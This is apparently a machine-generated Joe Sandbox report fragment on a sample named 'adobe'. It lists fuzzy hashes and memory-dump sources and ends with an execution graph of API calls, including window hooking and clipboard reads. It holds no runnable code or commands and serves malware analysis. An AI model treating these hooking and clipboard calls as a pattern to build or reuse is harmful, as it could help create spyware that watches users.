                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 07256ef93e04df31a459aa04eefd868ff56cc379ff60de5aebb4bd37b709100b
                                    • Instruction ID: a61e149f704a1e83d7480f9b2de1eab510aa8da0ddacfce2aed28f392b1633a3
                                    • Opcode Fuzzy Hash: 07256ef93e04df31a459aa04eefd868ff56cc379ff60de5aebb4bd37b709100b
                                    • Instruction Fuzzy Hash: 5EE06D727041286F9304DA6EDC84D6BBBEDFBCC670311807AF508C7310D9319C01C6A0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cf2afd84ef1e253dae01b0a0a5ad0c4e51f59f4d63612092b6247cfa5a5b13c9
                                    • Instruction ID: 2ce83dfd9e0ef0b5031fde15d8da5f831d126fdfe0ce8a89095803df63deba0c
                                    • Opcode Fuzzy Hash: cf2afd84ef1e253dae01b0a0a5ad0c4e51f59f4d63612092b6247cfa5a5b13c9
                                    • Instruction Fuzzy Hash: 44E06DB67001245F9304DBAED884D6BB7E9FBCC261321807AF508C7310DA319C05C7A0
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c2d7ad477246c5c312f9442127e58b0146e20709c2ed9b0fcccebdb6a8d5c0fc
                                    • Instruction ID: 9273094cd6cfa404f916fdbfe1c3a0d5945a768936ba6e5162f6b14348bf4f3a
                                    • Opcode Fuzzy Hash: c2d7ad477246c5c312f9442127e58b0146e20709c2ed9b0fcccebdb6a8d5c0fc
                                    • Instruction Fuzzy Hash: 5FE09238714704DBDA44A679DA517AB77BAD7C06D5F004069E701EBBC8DFA2DC024BE1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: beae4c4c842c653e9ffa158e90276cffc2bea3a290287be889b4473e2cde3109
                                    • Instruction ID: 021301b6c775dcbf7ae3cf235a99de9ff339c53c13840781c82ab77fc2d27b8c
                                    • Opcode Fuzzy Hash: beae4c4c842c653e9ffa158e90276cffc2bea3a290287be889b4473e2cde3109
                                    • Instruction Fuzzy Hash: 5FE092387147048BEA00A679DA51BA777AAD7807D5F004429E701DBBC8DFA3DC024BE1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 90e6de5cbb329205674f1722b254b5d56dc1b9aff3ab69621986d43347e838df
                                    • Instruction ID: 881a737c1ce67fb1fc8bf46bdda4721655e24e38562431de0cb34cb882d5f132
                                    • Opcode Fuzzy Hash: 90e6de5cbb329205674f1722b254b5d56dc1b9aff3ab69621986d43347e838df
                                    • Instruction Fuzzy Hash: 56E0863184D288DEC702DFB496115DA7FF0DF4B20135008DFD0859B512E6314A0ED792
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 942f27b05bed991766291c5006ddfcc3db5e6c17771668d4f67a34878b453634
                                    • Instruction ID: 2300bb91405f3ebe9bf8324da3c15b597f0cb4fa56fe547936ba341a3042458e
                                    • Opcode Fuzzy Hash: 942f27b05bed991766291c5006ddfcc3db5e6c17771668d4f67a34878b453634
                                    • Instruction Fuzzy Hash: ADE0EC3484E305CFCB008BA4C048BBDBBBDAF0B712B015091D45A9BA52C7BC9844CE54
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e704b0d5fedd833e8409a8f0c9f91ef1c355d0da620c121eec03d5da1176db31
                                    • Instruction ID: fbdeaf6cb44546de24d2bba919ff840bf4751417fa8de05f861fc16d8d79a59a
                                    • Opcode Fuzzy Hash: e704b0d5fedd833e8409a8f0c9f91ef1c355d0da620c121eec03d5da1176db31
                                    • Instruction Fuzzy Hash: 94D05B3510D3805FC201DB048850CE6B776ABD6110714858BFC5087751C726CD17C7A1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                    • Instruction ID: 544cb4247afde885f7aa4526af655624d58396403fd2cc9390bec168ae8a16a1
                                    • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                    • Instruction Fuzzy Hash: C7D01738C4E208CBCB00CB61C484BBDFB7DBB0A703B01A455C82A6BE02C7B89844CA00
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f17ad233badbefc1c2b247a0c9c3b957aa4cc21f61a1ea2f5f46479488787296
                                    • Instruction ID: 9616549a050d25d3c6445e76317323c57235c19aadfe994cf09e9399eb61765a
                                    • Opcode Fuzzy Hash: f17ad233badbefc1c2b247a0c9c3b957aa4cc21f61a1ea2f5f46479488787296
                                    • Instruction Fuzzy Hash: 4ED017B26093905FD301CA04CC50A96BBA5EFE6300F1A888BA48097392D6619D0BCB61
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 30c604b2482fbd880baee47bf8de8f1e12b9b45ab8f89e21d896a72459c7eadc
                                    • Instruction ID: a20b2ec102f30dd8a6874083893d62b2776d41c442bb076ca809cc6d14623635
                                    • Opcode Fuzzy Hash: 30c604b2482fbd880baee47bf8de8f1e12b9b45ab8f89e21d896a72459c7eadc
                                    • Instruction Fuzzy Hash: CAE01274D11208DFCB44DFF9D44579CBFF4AB04201F1080A9E80493750EB705A40CF81
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: affb4edc3fc6cda19fe3e10de697396bcddafdded7bc71eb297fc5abd215b699
                                    • Instruction ID: d61c3a896c1b6313521463de61adb4014f446a1b3ec9f21dad6e6982006a391f
                                    • Opcode Fuzzy Hash: affb4edc3fc6cda19fe3e10de697396bcddafdded7bc71eb297fc5abd215b699
                                    • Instruction Fuzzy Hash: E5E0EC749082588FDB50DF54D8907AEBBF5BB09310F109185D059E7701E73099408F41
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0c166b0590845a7f6683cce1f4d71b233d1727f7ac910ca648a4c936a43ee36a
                                    • Instruction ID: dd86c08c98dd81bea88f2555f2a5b3bb295cb2083d21a12f88468ca8a9a9cebf
                                    • Opcode Fuzzy Hash: 0c166b0590845a7f6683cce1f4d71b233d1727f7ac910ca648a4c936a43ee36a
                                    • Instruction Fuzzy Hash: 10E01D76804118DBC750CBF4DA457AD7BF19B45211F1046DBD41597550F9314611DB41
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7b2eb44071e130173a1bd7755e90cf7feb6dd4343b2d7839e6eefb57d624fd00
                                    • Instruction ID: e972100be5d34dc24829a0b04df69758d1da1f2a469def305adf8e91051b75dd
                                    • Opcode Fuzzy Hash: 7b2eb44071e130173a1bd7755e90cf7feb6dd4343b2d7839e6eefb57d624fd00
                                    • Instruction Fuzzy Hash: 71D0A771C0420CFF8B00DFE4850099EB7F9DB4910074008E5850697610EE324A0157E1
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7a766f35bbb6d47b3da0ab61fcf0d98f06f940107d5806b4ba344570753ae839
                                    • Instruction ID: 838056c66deaf80b6e93e8c66fded2eff5cff97301db46cf57f047432c5faa4b
                                    • Opcode Fuzzy Hash: 7a766f35bbb6d47b3da0ab61fcf0d98f06f940107d5806b4ba344570753ae839
                                    • Instruction Fuzzy Hash: A0D0A77180010CEFCB10CFE0C9009AEBFF9DB48200B1044E6E80AD3210FE314A10DB91
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e9e04952bd902803c3608b480cd6ec5f24a5b6e16035574d992737705777c51a
                                    • Instruction ID: 05f97a39e61c0253387e88fecc9edeef844a7ce3d0be5ad2ebd8ccc9763dac67
                                    • Opcode Fuzzy Hash: e9e04952bd902803c3608b480cd6ec5f24a5b6e16035574d992737705777c51a
                                    • Instruction Fuzzy Hash: A2D0123A0091C09EDB232B305C258E17FB0EF2B11431D48C7E0C04787386045956C766
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 22f4f5a9354d514e612bc1fe8ba868c104e94b75299888460666e2c073ef4329
                                    • Instruction ID: 07b5042028f6be5be9b1c90e61d88afdb5a10329bdee4e3fd141c0b7f836868e
                                    • Opcode Fuzzy Hash: 22f4f5a9354d514e612bc1fe8ba868c104e94b75299888460666e2c073ef4329
                                    • Instruction Fuzzy Hash: 79D05E7560C252DFC301CF84EA60845FBE1EBCA710B14888EE4409B256C722CC1BCB76
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 41405cf0d9900f0eed754cfe140ef38eeb07a3b9ceb2964a9b65a3a2fd3a7cbc
                                    • Instruction ID: fe092441917e28e9fec593cb07dfe3af3071145bc1b50f95dd892612cfd8eeaf
                                    • Opcode Fuzzy Hash: 41405cf0d9900f0eed754cfe140ef38eeb07a3b9ceb2964a9b65a3a2fd3a7cbc
                                    • Instruction Fuzzy Hash: FEC04CB6B4000197C748DAE8DC51F55A3969BE8214F28CD6BA809C7355EA26DD43C648
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                    • Instruction ID: 48e8204161933d4df9c7b41a33249025f43fd015cf28c75e97648b457401bf24
                                    • Opcode Fuzzy Hash: 9742d7865735c7252f6c48a7c294f1d1b4f483eb85901c8c33943e63f37f990d
                                    • Instruction Fuzzy Hash: 84D012752081119F9204CF44E940C6BF7E6EFC8B10B14C84EB84053310CA72DC17CBB2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 382d99bc5ab101b81cdbc2431b30c2efd7663cff2c301fa01884ffa26e053761
                                    • Instruction ID: a017c60bc8ae8a5621851825cff9af6ece79a792463b2672fed4ede586ea62d2
                                    • Opcode Fuzzy Hash: 382d99bc5ab101b81cdbc2431b30c2efd7663cff2c301fa01884ffa26e053761
                                    • Instruction Fuzzy Hash: BCC04C6134144057C749D51CDC52B14A7E69BC8205F5CC4786419C7395EE2ADC039604
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2504ef0549b848ced075f485438108e87368b5c6bc3874f92d8a06bbca8a0ea4
                                    • Instruction ID: 020fbe92ef4c9278b39077857cec1b9bf7251fb43cb70c488a1364dee6e6926e
                                    • Opcode Fuzzy Hash: 2504ef0549b848ced075f485438108e87368b5c6bc3874f92d8a06bbca8a0ea4
                                    • Instruction Fuzzy Hash: 37D012315146008EC341EA68C991848F770EFD1200B04C55FE4959B214EF31D54ADB41
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c88a708d0fe90579e17aa11bd0ff53d25954ecff6cc0ed970d9476ea2dbb27d8
                                    • Instruction ID: bc6a773f94ed39e95bd3662cff681c49d34b7903a04001a8a0822f72ec48466b
                                    • Opcode Fuzzy Hash: c88a708d0fe90579e17aa11bd0ff53d25954ecff6cc0ed970d9476ea2dbb27d8
                                    • Instruction Fuzzy Hash: FEC08C3111260887C2002BE6B40EF247FA86704206F409018B20842C514FB41450CFD2
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: dd4a921b5bdbb018e8676dcd94790cb3018b4a2f7757867f3bfed2f9ffa8e249
                                    • Instruction ID: 3ee87cda7ac08ce6747a8324fd7e074f287b595188e07ecef90828225cb99f47
                                    • Opcode Fuzzy Hash: dd4a921b5bdbb018e8676dcd94790cb3018b4a2f7757867f3bfed2f9ffa8e249
                                    • Instruction Fuzzy Hash: 95D012A840D3C1AFD3838B20CCA4144BFA08F83110B6A84CEC0C4CF2A7CA2A9847DB13
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ecc0459cf77e50bb3d4905373fa67fe0e4347812ce926e4b43fa4974f468d118
                                    • Instruction ID: 1d2b4385b635788fac6c6b99e1da4f182f60e98fedaaf7a71d28fe6ed2a5d143
                                    • Opcode Fuzzy Hash: ecc0459cf77e50bb3d4905373fa67fe0e4347812ce926e4b43fa4974f468d118
                                    • Instruction Fuzzy Hash: E8C01230C0D308CFC7208BA0C4216AC7F74AB0E602B20402AD063A3A13C7280800CF02
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 95df82e4d9ea2fab896ab2d5f4cd9401526f9b73f8b579ece35188fd18935b65
                                    • Instruction ID: f549a0f9c77a42a91c064ede539c57ff2d9493525a212d846f405f0d9ea5e047
                                    • Opcode Fuzzy Hash: 95df82e4d9ea2fab896ab2d5f4cd9401526f9b73f8b579ece35188fd18935b65
                                    • Instruction Fuzzy Hash: 1AC04C390560059B8B41B7548A84D65BAE5FF99B057858852F14547834C721D918DB15
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7df95b3b6378d78929af084b7c5045bbf7f31fc23d3d8dbd93fd2b53839db375
                                    • Instruction ID: 11544bd01081f2e05032c020985375bf032f7c5820dfb8d235a8693d209e8fce
                                    • Opcode Fuzzy Hash: 7df95b3b6378d78929af084b7c5045bbf7f31fc23d3d8dbd93fd2b53839db375
                                    • Instruction Fuzzy Hash: 56B0223A0C0200A08A0033208A80F2EE020EFA0F00FC08C00F38800C208320C8B2CA2F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 70030fba908d13a062f97a5876fdb96d9ac80bd3598e36bd44a90c2e89c588c4
                                    • Instruction ID: 49b99a068f1bb1e58b52560609cd1e8d9048e98c4d678a32dfa84ebc4355865c
                                    • Opcode Fuzzy Hash: 70030fba908d13a062f97a5876fdb96d9ac80bd3598e36bd44a90c2e89c588c4
                                    • Instruction Fuzzy Hash: DBC04874D08208CBCB648BA0D464AADBBB4EB0D612B20912AE027A3A12DB281840CF40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8bfa10551fa780b8079d86f69995faa5b5f08e759d55af4c2eda71883ec10b27
                                    • Instruction ID: 77e4e99a053e6bea98aa70cabe24abb04b426529233fd04467ba5eba9f0ae981
                                    • Opcode Fuzzy Hash: 8bfa10551fa780b8079d86f69995faa5b5f08e759d55af4c2eda71883ec10b27
                                    • Instruction Fuzzy Hash: 92B09234A09219CFDB10DF04C990AEDB3B9FB54610F04C880880F675669A30EE448B40
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                    • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                    • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                    • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5660df5bcb40be5bdcae5358873d2b05eb7df75e0a87682ba1b47114d51b3d86
                                    • Instruction ID: 26a2ef16a48a5d664e3a23c019c6368a7d4676139815a4e201273350ace2ea2f
                                    • Opcode Fuzzy Hash: 5660df5bcb40be5bdcae5358873d2b05eb7df75e0a87682ba1b47114d51b3d86
                                    • Instruction Fuzzy Hash: 62A001B96410009B9644DA94CD92915B762EB85259768C899A8298B366CB23ED139A80

                                    Execution Graph

                                    Execution Coverage:11.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:157
                                    Total number of Limit Nodes:21
                                    execution_graph 40867 16c0848 40869 16c084e 40867->40869 40868 16c091b 40869->40868 40871 16c134f 40869->40871 40873 16c1353 40871->40873 40872 16c147a 40872->40869 40873->40872 40875 16c8219 40873->40875 40876 16c8223 40875->40876 40877 16c82d9 40876->40877 40881 6dffb27 40876->40881 40891 6dff8e8 40876->40891 40896 6dff8d9 40876->40896 40877->40873 40884 6dffb36 40881->40884 40885 6dff8fd 40881->40885 40882 6dffb12 40882->40877 40883 6dffbd0 40883->40877 40884->40883 40901 16ced08 40884->40901 40904 16cecf9 40884->40904 40885->40882 40887 6dffb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 40885->40887 40890 6dffd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 40885->40890 40886 6dffc9e 40886->40877 40887->40885 40890->40885 40893 6dff8fd 40891->40893 40892 6dffb12 40892->40877 40893->40892 40894 6dffb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 40893->40894 40895 6dffd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 40893->40895 40894->40893 40895->40893 40898 6dff8e8 40896->40898 40897 6dffb12 40897->40877 40898->40897 40899 6dffb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 40898->40899 40900 6dffd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 40898->40900 40899->40898 40900->40898 40908 16ced30 40901->40908 40902 16ced16 40902->40886 40905 16ced08 40904->40905 40907 16ced30 2 API calls 40905->40907 40906 16ced16 40906->40886 40907->40906 40909 16ced4d 40908->40909 40910 16ced75 40908->40910 40909->40902 40916 16ced30 GlobalMemoryStatusEx 40910->40916 40917 16cee18 40910->40917 40911 16ced96 40911->40902 40912 16ced92 40912->40911 40913 16cee5e GlobalMemoryStatusEx 40912->40913 40914 16cee8e 40913->40914 40914->40902 40916->40912 40918 16cee5e GlobalMemoryStatusEx 40917->40918 40919 16cee8e 40918->40919 40919->40912 40920 6de68f8 DuplicateHandle 40921 6de698e 40920->40921 40922 6de29f8 40923 6de2a60 CreateWindowExW 40922->40923 40925 6de2b1c 40923->40925 40925->40925 41036 6dea028 41037 6dea06c SetWindowsHookExA 41036->41037 41039 6dea0b2 41037->41039 40926 6de1950 40927 6de1998 GetModuleHandleW 40926->40927 40928 6de1992 40926->40928 40929 6de19c5 40927->40929 40928->40927 41040 6de7a80 41041 6de7a88 41040->41041 41043 6de7aab 41041->41043 41044 6de64bc 41041->41044 41045 6de7ac0 KiUserCallbackDispatcher 41044->41045 41047 6de7b2e 41045->41047 41047->41041 41048 6de8340 41049 6de834b 41048->41049 41050 6de835b 41049->41050 41052 6de7d6c 41049->41052 41053 6de8390 OleInitialize 41052->41053 41054 6de83f4 41053->41054 41054->41050 40930 13fd030 40931 13fd048 40930->40931 40932 13fd0a2 40931->40932 40937 6de74fe 40931->40937 40945 6de2bb0 40931->40945 40949 6de2ba3 40931->40949 40953 6de0774 40931->40953 40938 6de7500 40937->40938 40939 6de7561 40938->40939 40941 6de7551 40938->40941 40973 6de6464 40939->40973 40961 6de7678 40941->40961 40967 6de7688 40941->40967 40942 6de755f 40942->40942 40946 6de2bd6 40945->40946 40947 6de0774 2 API calls 40946->40947 40948 6de2bf7 40947->40948 40948->40932 40950 6de2bb0 40949->40950 40951 6de0774 2 API calls 40950->40951 40952 6de2bf7 40951->40952 40952->40932 40954 6de077f 40953->40954 40955 6de7561 40954->40955 40957 6de7551 40954->40957 40956 6de6464 2 API calls 40955->40956 40958 6de755f 40956->40958 40959 6de7688 2 API calls 40957->40959 40960 6de7678 2 API calls 40957->40960 40958->40958 40959->40958 40960->40958 40963 6de7688 40961->40963 40962 6de6464 2 API calls 40962->40963 40963->40962 40964 6de776e 40963->40964 40980 6de7b60 40963->40980 40985 6de7b51 40963->40985 40964->40942 40968 6de7696 40967->40968 40969 6de6464 2 API calls 40968->40969 40970 6de776e 40968->40970 40971 6de7b60 OleGetClipboard 40968->40971 40972 6de7b51 OleGetClipboard 40968->40972 40969->40968 40970->40942 40971->40968 40972->40968 40974 6de646f 40973->40974 40975 6de77ca 40974->40975 40976 6de7874 40974->40976 40977 6de7822 CallWindowProcW 40975->40977 40979 6de77d1 40975->40979 40978 6de0774 OleGetClipboard 40976->40978 40977->40979 40978->40979 40979->40942 40981 6de7b7f 40980->40981 40982 6de7bea 40981->40982 40990 6de8100 40981->40990 40996 6de8120 40981->40996 40982->40963 40986 6de7b56 40985->40986 40987 6de7b46 40986->40987 40988 6de8100 OleGetClipboard 40986->40988 40989 6de8120 OleGetClipboard 40986->40989 40987->40963 40988->40986 40989->40986 40992 6de8105 40990->40992 40991 6de813c 40991->40981 40992->40991 41002 6de8168 40992->41002 41013 6de8159 40992->41013 40993 6de8151 40993->40981 40998 6de8128 40996->40998 40997 6de813c 40997->40981 40998->40997 41000 6de8168 OleGetClipboard 40998->41000 41001 6de8159 OleGetClipboard 40998->41001 40999 6de8151 40999->40981 41000->40999 41001->40999 41003 6de817a 41002->41003 41004 6de8195 41003->41004 41006 6de81d9 41003->41006 41009 6de8168 OleGetClipboard 41004->41009 41010 6de8159 OleGetClipboard 41004->41010 41005 6de819b 41005->40993 41008 6de8259 41006->41008 41024 6de8430 41006->41024 41028 6de8420 41006->41028 41007 6de8277 41007->40993 41008->40993 41009->41005 41010->41005 41014 6de8162 41013->41014 41015 6de8195 41014->41015 41017 6de81d9 41014->41017 41020 6de8168 OleGetClipboard 41015->41020 41021 6de8159 OleGetClipboard 41015->41021 41016 6de819b 41016->40993 41019 6de8259 41017->41019 41022 6de8430 OleGetClipboard 41017->41022 41023 6de8420 OleGetClipboard 41017->41023 41018 6de8277 41018->40993 41019->40993 41020->41016 41021->41016 41022->41018 41023->41018 41026 6de8445 41024->41026 41027 6de846b 41026->41027 41032 6de7e80 41026->41032 41027->41007 41030 6de8430 41028->41030 41029 6de7e80 OleGetClipboard 41029->41030 41030->41029 41031 6de846b 41030->41031 41031->41007 41033 6de84d8 OleGetClipboard 41032->41033 41035 6de8572 41033->41035
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.4147625601.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_6df0000_adobe.jbxd
                                    Similarity
